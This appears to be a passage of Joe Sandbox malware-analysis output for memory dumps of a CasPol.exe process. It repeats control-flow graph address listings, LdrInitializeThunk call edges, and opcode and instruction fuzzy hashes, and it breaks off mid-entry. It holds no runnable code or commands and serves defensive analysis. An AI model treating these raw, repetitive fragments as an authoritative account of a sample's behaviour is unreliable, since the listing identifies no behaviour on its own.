20037ec6 call 1207f50 13218->13446 13447 20037ec6 call 1207ef2 13218->13447 13226 20037ecc-20037f56 13416 20037f56 call 12087f8 13226->13416 13417 20037f56 call 1208858 13226->13417 13242 20037f5c-20038038 call 120974c 13265 20038331-20038342 13242->13265 13266 2003803e-20038061 13242->13266 13272 20038348-2003834f 13265->13272 13273 2003869c-200386a3 13265->13273 13281 20038067-20038083 13266->13281 13282 20038319-2003832e 13266->13282 13276 200383e6-200383ed 13272->13276 13277 20038355-20038363 13272->13277 13278 20038725-20038740 13273->13278 13279 200386a9-2003871a 13273->13279 13283 200383f3-20038538 call 20035aa8 call 200356b0 13276->13283 13284 2003855d-20038564 13276->13284 13448 20038369 call 1209d90 13277->13448 13449 20038369 call 1209d81 13277->13449 13279->13278 13300 2003808b-200380d9 13281->13300 13282->13265 13283->13273 13284->13273 13286 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 13284->13286 13286->13273 13299 2003836f-200383a9 13406 200383af call 120b058 13299->13406 13407 200383af call 120afba 13299->13407 13310 20038301-20038313 13300->13310 13311 200380df-200380e6 13300->13311 13310->13281 13310->13282 13314 200381ff-2003822a 13311->13314 13315 200380ec-200381fa 13311->13315 13314->13310 13318 20038230-200382d8 13314->13318 13315->13310 13318->13310 13319 200383b5 13319->13273 13396->13158 13397->13158 13398->13122 13399->13122 13400->13122 13401->13122 13402->13122 13403->13122 13404->13162 13405->13162 13406->13319 13407->13319 13408->13128 13409->13128 13410->13131 13411->13131 13412->13131 13413->13131 13414->13166 13415->13166 13416->13242 13417->13242 13418->13210 13419->13210 13420->13134 13421->13134 13422->13170 13423->13170 13424->13137 13425->13137 13426->13174 13427->13174 13428->13218 13429->13218 13430->13218 13431->13141 13432->13141 13433->13141 13434->13178 13435->13178 13436->13178 13437->13147 13438->13147 13439->13185 13440->13185 13441->13185 13442->13185 13443->13185 13444->13185 13446->13226 13447->13226 13448->13299 13449->13299 13450->13154 13451->13154 13452->13154 13453->13154
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 420d82a530ede4af225f99a9b198fb810815713fd35ce3c91940b614be4a7afb
                                                                                                                      • Instruction ID: 6ef9b011e37cd6effac8d003a6a97d93946d1229ec9489423cd95310edd97e3d
                                                                                                                      • Opcode Fuzzy Hash: 420d82a530ede4af225f99a9b198fb810815713fd35ce3c91940b614be4a7afb
                                                                                                                      • Instruction Fuzzy Hash: 33121874A042248FDB68AF70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 13454 20037635-200376a4 call 20036288 call 20036418 13735 200376a4 call 1203c70 13454->13735 13736 200376a4 call 1203cd0 13454->13736 13463 200376aa-200376ec 13737 200376ec call 1204420 13463->13737 13738 200376ec call 1204411 13463->13738 13739 200376ec call 12047f7 13463->13739 13740 200376ec call 1204798 13463->13740 13466 200376f2-20037734 13747 20037734 call 12048b8 13466->13747 13748 20037734 call 1204859 13466->13748 13469 2003773a-2003777c 13751 2003777c call 1205955 13469->13751 13752 2003777c call 1205958 13469->13752 13472 20037782-200377da 13758 200377da call 12061a0 13472->13758 13759 200377da call 120605a 13472->13759 13760 200377da call 12061ff 13472->13760 13476 200377e0-2003785e 13764 2003785e call 12065e0 13476->13764 13765 2003785e call 12064e0 13476->13765 13482 20037864-200378dd 13777 200378e3 call 1206ad5 13482->13777 13778 200378e3 call 12069a8 13482->13778 13779 200378e3 call 1206a08 13482->13779 13780 200378e3 call 1206a58 13482->13780 13489 200378e9-2003790b 13781 2003790d call 1206ba0 13489->13781 13782 2003790d call 1206b90 13489->13782 13493 20037913-20037939 13731 2003793b call 1206ba0 13493->13731 13732 2003793b call 1206b90 13493->13732 13497 20037941-20037967 13741 20037969 call 1206ba0 13497->13741 13742 20037969 call 1206b90 13497->13742 13501 2003796f-20037995 13749 20037997 call 1206ba0 13501->13749 13750 20037997 call 1206b90 13501->13750 13505 2003799d-200379c3 13753 200379c5 call 1206ba0 13505->13753 13754 200379c5 call 1206b90 13505->13754 13509 200379cb-20037a37 LdrInitializeThunk 13510 20037d5e 13509->13510 13511 20037a3d-20037a61 13509->13511 13761 20037d5e call 12071c0 13510->13761 13762 20037d5e call 12070c0 13510->13762 13763 20037d5e call 12070d0 13510->13763 13517 20037a67 13511->13517 13518 20037bba-20037bde 13511->13518 13513 20037d64-20037da6 13766 20037da6 call 12071c0 13513->13766 13767 20037da6 call 12070c0 13513->13767 13768 20037da6 call 12070d0 13513->13768 13769 20037da6 call 1207520 13513->13769 13770 20037da6 call 1207620 13513->13770 13771 20037da6 call 12074b6 13513->13771 13517->13518 13519 20037a6d-20037bb5 13517->13519 13527 20037be0 13518->13527 13528 20037be4-20037be6 13518->13528 13519->13510 13520 20037dac-20037e36 13745 20037e36 call 1207c08 13520->13745 13746 20037e36 call 1207c68 13520->13746 13529 20037be2 13527->13529 13530 20037be8 13527->13530 13531 20037bed-20037c17 13528->13531 13529->13528 13530->13531 13539 20037c19 13531->13539 13540 20037c1d-20037c1f 13531->13540 13542 20037c21 13539->13542 13543 20037c1b 13539->13543 13544 20037c26-20037c2c 13540->13544 13542->13544 13543->13540 13544->13510 13546 20037c32-20037d35 13544->13546 13545 20037e3c-20037e7e 13755 20037e7e call 1207d80 13545->13755 13756 20037e7e call 1207e30 13545->13756 13757 20037e7e call 1207e8f 13545->13757 13546->13510 13553 20037e84-20037ec6 13773 20037ec6 call 1207f50 13553->13773 13774 20037ec6 call 1207ef2 13553->13774 13561 20037ecc-20037f56 13743 20037f56 call 12087f8 13561->13743 13744 20037f56 call 1208858 13561->13744 13577 20037f5c-20038038 call 120974c 13600 20038331-20038342 13577->13600 13601 2003803e-20038061 13577->13601 13607 20038348-2003834f 13600->13607 13608 2003869c-200386a3 13600->13608 13616 20038067-20038083 13601->13616 13617 20038319-2003832e 13601->13617 13611 200383e6-200383ed 13607->13611 13612 20038355-20038363 13607->13612 13613 20038725-20038740 13608->13613 13614 200386a9-2003871a 13608->13614 13618 200383f3-20038538 call 20035aa8 call 200356b0 13611->13618 13619 2003855d-20038564 13611->13619 13775 20038369 call 1209d90 13612->13775 13776 20038369 call 1209d81 13612->13776 13614->13613 13635 2003808b-200380d9 13616->13635 13617->13600 13618->13608 13619->13608 13621 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 13619->13621 13621->13608 13634 2003836f-200383a9 13733 200383af call 120b058 13634->13733 13734 200383af call 120afba 13634->13734 13645 20038301-20038313 13635->13645 13646 200380df-200380e6 13635->13646 13645->13616 13645->13617 13649 200381ff-2003822a 13646->13649 13650 200380ec-200381fa 13646->13650 13649->13645 13653 20038230-200382d8 13649->13653 13650->13645 13653->13645 13654 200383b5 13654->13608 13731->13497 13732->13497 13733->13654 13734->13654 13735->13463 13736->13463 13737->13466 13738->13466 13739->13466 13740->13466 13741->13501 13742->13501 13743->13577 13744->13577 13745->13545 13746->13545 13747->13469 13748->13469 13749->13505 13750->13505 13751->13472 13752->13472 13753->13509 13754->13509 13755->13553 13756->13553 13757->13553 13758->13476 13759->13476 13760->13476 13761->13513 13762->13513 13763->13513 13764->13482 13765->13482 13766->13520 13767->13520 13768->13520 13769->13520 13770->13520 13771->13520 13773->13561 13774->13561 13775->13634 13776->13634 13777->13489 13778->13489 13779->13489 13780->13489 13781->13493 13782->13493
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 41884bb500af4368896f22dd58ef82dbd5696d352e775137e181c00088c93185
                                                                                                                      • Instruction ID: 714f0b74b742018b73d15d01d2ef0d072e6a4e685767628cc36ddc1c7c77e6f1
                                                                                                                      • Opcode Fuzzy Hash: 41884bb500af4368896f22dd58ef82dbd5696d352e775137e181c00088c93185
                                                                                                                      • Instruction Fuzzy Hash: CA121874A042248FDB689F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 13783 2003767d-200376a4 call 20036288 call 20036418 14061 200376a4 call 1203c70 13783->14061 14062 200376a4 call 1203cd0 13783->14062 13789 200376aa-200376ec 14063 200376ec call 1204420 13789->14063 14064 200376ec call 1204411 13789->14064 14065 200376ec call 12047f7 13789->14065 14066 200376ec call 1204798 13789->14066 13792 200376f2-20037734 14073 20037734 call 12048b8 13792->14073 14074 20037734 call 1204859 13792->14074 13795 2003773a-2003777c 14077 2003777c call 1205955 13795->14077 14078 2003777c call 1205958 13795->14078 13798 20037782-200377da 14084 200377da call 12061a0 13798->14084 14085 200377da call 120605a 13798->14085 14086 200377da call 12061ff 13798->14086 13802 200377e0-2003785e 14090 2003785e call 12065e0 13802->14090 14091 2003785e call 12064e0 13802->14091 13808 20037864-200378dd 14103 200378e3 call 1206ad5 13808->14103 14104 200378e3 call 12069a8 13808->14104 14105 200378e3 call 1206a08 13808->14105 14106 200378e3 call 1206a58 13808->14106 13815 200378e9-2003790b 14107 2003790d call 1206ba0 13815->14107 14108 2003790d call 1206b90 13815->14108 13819 20037913-20037939 14057 2003793b call 1206ba0 13819->14057 14058 2003793b call 1206b90 13819->14058 13823 20037941-20037967 14067 20037969 call 1206ba0 13823->14067 14068 20037969 call 1206b90 13823->14068 13827 2003796f-20037995 14075 20037997 call 1206ba0 13827->14075 14076 20037997 call 1206b90 13827->14076 13831 2003799d-200379c3 14079 200379c5 call 1206ba0 13831->14079 14080 200379c5 call 1206b90 13831->14080 13835 200379cb-20037a37 LdrInitializeThunk 13836 20037d5e 13835->13836 13837 20037a3d-20037a61 13835->13837 14087 20037d5e call 12071c0 13836->14087 14088 20037d5e call 12070c0 13836->14088 14089 20037d5e call 12070d0 13836->14089 13843 20037a67 13837->13843 13844 20037bba-20037bde 13837->13844 13839 20037d64-20037da6 14092 20037da6 call 12071c0 13839->14092 14093 20037da6 call 12070c0 13839->14093 14094 20037da6 call 12070d0 13839->14094 14095 20037da6 call 1207520 13839->14095 14096 20037da6 call 1207620 13839->14096 14097 20037da6 call 12074b6 13839->14097 13843->13844 13845 20037a6d-20037bb5 13843->13845 13853 20037be0 13844->13853 13854 20037be4-20037be6 13844->13854 13845->13836 13846 20037dac-20037e36 14071 20037e36 call 1207c08 13846->14071 14072 20037e36 call 1207c68 13846->14072 13855 20037be2 13853->13855 13856 20037be8 13853->13856 13857 20037bed-20037c17 13854->13857 13855->13854 13856->13857 13865 20037c19 13857->13865 13866 20037c1d-20037c1f 13857->13866 13868 20037c21 13865->13868 13869 20037c1b 13865->13869 13870 20037c26-20037c2c 13866->13870 13868->13870 13869->13866 13870->13836 13872 20037c32-20037d35 13870->13872 13871 20037e3c-20037e7e 14081 20037e7e call 1207d80 13871->14081 14082 20037e7e call 1207e30 13871->14082 14083 20037e7e call 1207e8f 13871->14083 13872->13836 13879 20037e84-20037ec6 14099 20037ec6 call 1207f50 13879->14099 14100 20037ec6 call 1207ef2 13879->14100 13887 20037ecc-20037f56 14069 20037f56 call 12087f8 13887->14069 14070 20037f56 call 1208858 13887->14070 13903 20037f5c-20038038 call 120974c 13926 20038331-20038342 13903->13926 13927 2003803e-20038061 13903->13927 13933 20038348-2003834f 13926->13933 13934 2003869c-200386a3 13926->13934 13942 20038067-20038083 13927->13942 13943 20038319-2003832e 13927->13943 13937 200383e6-200383ed 13933->13937 13938 20038355-20038363 13933->13938 13939 20038725-20038740 13934->13939 13940 200386a9-2003871a 13934->13940 13944 200383f3-20038538 call 20035aa8 call 200356b0 13937->13944 13945 2003855d-20038564 13937->13945 14101 20038369 call 1209d90 13938->14101 14102 20038369 call 1209d81 13938->14102 13940->13939 13961 2003808b-200380d9 13942->13961 13943->13926 13944->13934 13945->13934 13947 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 13945->13947 13947->13934 13960 2003836f-200383a9 14059 200383af call 120b058 13960->14059 14060 200383af call 120afba 13960->14060 13971 20038301-20038313 13961->13971 13972 200380df-200380e6 13961->13972 13971->13942 13971->13943 13975 200381ff-2003822a 13972->13975 13976 200380ec-200381fa 13972->13976 13975->13971 13979 20038230-200382d8 13975->13979 13976->13971 13979->13971 13980 200383b5 13980->13934 14057->13823 14058->13823 14059->13980 14060->13980 14061->13789 14062->13789 14063->13792 14064->13792 14065->13792 14066->13792 14067->13827 14068->13827 14069->13903 14070->13903 14071->13871 14072->13871 14073->13795 14074->13795 14075->13831 14076->13831 14077->13798 14078->13798 14079->13835 14080->13835 14081->13879 14082->13879 14083->13879 14084->13802 14085->13802 14086->13802 14087->13839 14088->13839 14089->13839 14090->13808 14091->13808 14092->13846 14093->13846 14094->13846 14095->13846 14096->13846 14097->13846 14099->13887 14100->13887 14101->13960 14102->13960 14103->13815 14104->13815 14105->13815 14106->13815 14107->13819 14108->13819
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 9ac30b3651771b4b8f00c2fd2c50f8c9082c9e387a785f8bcd6fb6902baa2c36
                                                                                                                      • Instruction ID: 6dd2d70df8de6cae430dea7638049ca134668105479711f960c3ea98a6db73bd
                                                                                                                      • Opcode Fuzzy Hash: 9ac30b3651771b4b8f00c2fd2c50f8c9082c9e387a785f8bcd6fb6902baa2c36
                                                                                                                      • Instruction Fuzzy Hash: 65121878A042248FDB689F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 14109 200376c5-200376ec call 20036288 call 20036418 14394 200376ec call 1204420 14109->14394 14395 200376ec call 1204411 14109->14395 14396 200376ec call 12047f7 14109->14396 14397 200376ec call 1204798 14109->14397 14115 200376f2-20037734 14404 20037734 call 12048b8 14115->14404 14405 20037734 call 1204859 14115->14405 14118 2003773a-2003777c 14408 2003777c call 1205955 14118->14408 14409 2003777c call 1205958 14118->14409 14121 20037782-200377da 14415 200377da call 12061a0 14121->14415 14416 200377da call 120605a 14121->14416 14417 200377da call 12061ff 14121->14417 14125 200377e0-2003785e 14421 2003785e call 12065e0 14125->14421 14422 2003785e call 12064e0 14125->14422 14131 20037864-200378dd 14384 200378e3 call 1206ad5 14131->14384 14385 200378e3 call 12069a8 14131->14385 14386 200378e3 call 1206a08 14131->14386 14387 200378e3 call 1206a58 14131->14387 14138 200378e9-2003790b 14388 2003790d call 1206ba0 14138->14388 14389 2003790d call 1206b90 14138->14389 14142 20037913-20037939 14390 2003793b call 1206ba0 14142->14390 14391 2003793b call 1206b90 14142->14391 14146 20037941-20037967 14398 20037969 call 1206ba0 14146->14398 14399 20037969 call 1206b90 14146->14399 14150 2003796f-20037995 14406 20037997 call 1206ba0 14150->14406 14407 20037997 call 1206b90 14150->14407 14154 2003799d-200379c3 14410 200379c5 call 1206ba0 14154->14410 14411 200379c5 call 1206b90 14154->14411 14158 200379cb-20037a37 LdrInitializeThunk 14159 20037d5e 14158->14159 14160 20037a3d-20037a61 14158->14160 14418 20037d5e call 12071c0 14159->14418 14419 20037d5e call 12070c0 14159->14419 14420 20037d5e call 12070d0 14159->14420 14166 20037a67 14160->14166 14167 20037bba-20037bde 14160->14167 14162 20037d64-20037da6 14423 20037da6 call 12071c0 14162->14423 14424 20037da6 call 12070c0 14162->14424 14425 20037da6 call 12070d0 14162->14425 14426 20037da6 call 1207520 14162->14426 14427 20037da6 call 1207620 14162->14427 14428 20037da6 call 12074b6 14162->14428 14166->14167 14168 20037a6d-20037bb5 14166->14168 14176 20037be0 14167->14176 14177 20037be4-20037be6 14167->14177 14168->14159 14169 20037dac-20037e36 14402 20037e36 call 1207c08 14169->14402 14403 20037e36 call 1207c68 14169->14403 14178 20037be2 14176->14178 14179 20037be8 14176->14179 14180 20037bed-20037c17 14177->14180 14178->14177 14179->14180 14188 20037c19 14180->14188 14189 20037c1d-20037c1f 14180->14189 14191 20037c21 14188->14191 14192 20037c1b 14188->14192 14193 20037c26-20037c2c 14189->14193 14191->14193 14192->14189 14193->14159 14195 20037c32-20037d35 14193->14195 14194 20037e3c-20037e7e 14412 20037e7e call 1207d80 14194->14412 14413 20037e7e call 1207e30 14194->14413 14414 20037e7e call 1207e8f 14194->14414 14195->14159 14202 20037e84-20037ec6 14380 20037ec6 call 1207f50 14202->14380 14381 20037ec6 call 1207ef2 14202->14381 14210 20037ecc-20037f56 14400 20037f56 call 12087f8 14210->14400 14401 20037f56 call 1208858 14210->14401 14226 20037f5c-20038038 call 120974c 14249 20038331-20038342 14226->14249 14250 2003803e-20038061 14226->14250 14256 20038348-2003834f 14249->14256 14257 2003869c-200386a3 14249->14257 14265 20038067-20038083 14250->14265 14266 20038319-2003832e 14250->14266 14260 200383e6-200383ed 14256->14260 14261 20038355-20038363 14256->14261 14262 20038725-20038740 14257->14262 14263 200386a9-2003871a 14257->14263 14267 200383f3-20038538 call 20035aa8 call 200356b0 14260->14267 14268 2003855d-20038564 14260->14268 14382 20038369 call 1209d90 14261->14382 14383 20038369 call 1209d81 14261->14383 14263->14262 14284 2003808b-200380d9 14265->14284 14266->14249 14267->14257 14268->14257 14270 2003856a-2003867f call 20035aa8 call 200356b0 call 200356f8 14268->14270 14270->14257 14283 2003836f-200383a9 14392 200383af call 120b058 14283->14392 14393 200383af call 120afba 14283->14393 14294 20038301-20038313 14284->14294 14295 200380df-200380e6 14284->14295 14294->14265 14294->14266 14298 200381ff-2003822a 14295->14298 14299 200380ec-200381fa 14295->14299 14298->14294 14302 20038230-200382d8 14298->14302 14299->14294 14302->14294 14303 200383b5 14303->14257 14380->14210 14381->14210 14382->14283 14383->14283 14384->14138 14385->14138 14386->14138 14387->14138 14388->14142 14389->14142 14390->14146 14391->14146 14392->14303 14393->14303 14394->14115 14395->14115 14396->14115 14397->14115 14398->14150 14399->14150 14400->14226 14401->14226 14402->14194 14403->14194 14404->14118 14405->14118 14406->14154 14407->14154 14408->14121 14409->14121 14410->14158 14411->14158 14412->14202 14413->14202 14414->14202 14415->14125 14416->14125 14417->14125 14418->14162 14419->14162 14420->14162 14421->14131 14422->14131 14423->14169 14424->14169 14425->14169 14426->14169 14427->14169 14428->14169
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 25f2ee3d1d13a8037e588113ee2a6eb697c397089b532bad73268e95a9aa5c84
                                                                                                                      • Instruction ID: 820d3d60e1fa386eca445366c123bb2f87f30822c8c8eb2c1b55144ff7c2fd4b
                                                                                                                      • Opcode Fuzzy Hash: 25f2ee3d1d13a8037e588113ee2a6eb697c397089b532bad73268e95a9aa5c84
                                                                                                                      • Instruction Fuzzy Hash: CA120878A042248FDB689F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 81cd75a057f3bf281389ba3e5b5b7221ea62b7be35be5b1ea027e76855c202e1
                                                                                                                      • Instruction ID: 3b07594e93aa4785ca106c901efd3f3b16d0150f6fab62bcd7e11ad49124b26a
                                                                                                                      • Opcode Fuzzy Hash: 81cd75a057f3bf281389ba3e5b5b7221ea62b7be35be5b1ea027e76855c202e1
                                                                                                                      • Instruction Fuzzy Hash: B9120974A042248FDB68AF70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a1b2697008ab9338cc62dfff89aa44a7157df235ee54a253b4fbc954207fd324
                                                                                                                      • Instruction ID: 5b89869de3fd53bbde7d90369c80e14ef84d9272aa365178da54ea1500ef8750
                                                                                                                      • Opcode Fuzzy Hash: a1b2697008ab9338cc62dfff89aa44a7157df235ee54a253b4fbc954207fd324
                                                                                                                      • Instruction Fuzzy Hash: E1021978A042248FDB689F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 2a0b1dc430378a36ce42e40c7c1e5937914892845aba59a064c72a19eaa9ec44
                                                                                                                      • Instruction ID: 202724db1200b7861c22c49137fc90dc30f782f558587cd774011d744fe4c7dc
                                                                                                                      • Opcode Fuzzy Hash: 2a0b1dc430378a36ce42e40c7c1e5937914892845aba59a064c72a19eaa9ec44
                                                                                                                      • Instruction Fuzzy Hash: EB0219B4A042248FDB649F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 22c6210e9e5b2bfc4c6b9c97282ed489f7bc25ba360deb96467307db5343049d
                                                                                                                      • Instruction ID: 62c415202e847e53cd54531f9c49190e8fa161cf4cdbe4fc49b92f0241805f1c
                                                                                                                      • Opcode Fuzzy Hash: 22c6210e9e5b2bfc4c6b9c97282ed489f7bc25ba360deb96467307db5343049d
                                                                                                                      • Instruction Fuzzy Hash: D70219B4A042248FDB649F70C98879DBBB6BF88705F2085E9D60DA3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ed136a7fc9cff6ea297957954206bb929185af2b2935dcd909a565604add3012
                                                                                                                      • Instruction ID: 061d1ff5c44e7507f5092516a37db42c11df19782a8593e72ffcf7f7530c92ad
                                                                                                                      • Opcode Fuzzy Hash: ed136a7fc9cff6ea297957954206bb929185af2b2935dcd909a565604add3012
                                                                                                                      • Instruction Fuzzy Hash: 90021974A042248FDB649FB0C98879DB7B6BF88605F2085E9D60DE3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255520482718.0000000020030000.00000040.00000800.00020000.00000000.sdmp, Offset: 20030000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_20030000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d1b32b4ff61bba4a3cba73239ac41c0b8563b0d6ed6ef2ed0b1d75728e3edef0
                                                                                                                      • Instruction ID: 7220229cd91b7a4f66eb77432e400035a92b70df11fc9d536064fca40d40b67f
                                                                                                                      • Opcode Fuzzy Hash: d1b32b4ff61bba4a3cba73239ac41c0b8563b0d6ed6ef2ed0b1d75728e3edef0
                                                                                                                      • Instruction Fuzzy Hash: 3EF10978A042248FDB689FB0C88879DB7B6BF88605F2085E9D60DE3354DB349E85CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6f8293de06413054922210af205914fc1ca6b35a69c053c69d3cd7db41a9cc49
                                                                                                                      • Instruction ID: b7db72d902d7c2c6c7b09e4459d4ef186ee7f9cc6a911c23988f692c5b3aa2ee
                                                                                                                      • Opcode Fuzzy Hash: 6f8293de06413054922210af205914fc1ca6b35a69c053c69d3cd7db41a9cc49
                                                                                                                      • Instruction Fuzzy Hash: 1791BD34E242198FDB069BB4C844BAF7BF2AF84344F158969E1059B396DF78EC05CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255489784172.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1160000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: f396dd12267a7e3f77da62692e42bae402b00d35bd61cc56ac4c6ed34bc5d47b
                                                                                                                      • Instruction ID: bffa83731a7e56eb89983cf9cff67da5f4f12d0602398a592e680299ee62444a
                                                                                                                      • Opcode Fuzzy Hash: f396dd12267a7e3f77da62692e42bae402b00d35bd61cc56ac4c6ed34bc5d47b
                                                                                                                      • Instruction Fuzzy Hash: 7B711835B093449FCB09DBB4C844AEEBBF5AF85204F1489AAD106DB395EF71E805C751
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.255490314546.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_1200000_CasPol.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ede647240bc4334815e31b345ccdf8a44eda8e4811210c8123ef71aa606b129b
                                                                                                                      • Instruction ID: 83cd7dbe054b25247b54c164a7ffa9a25d914befdc723926bd410422469743fe
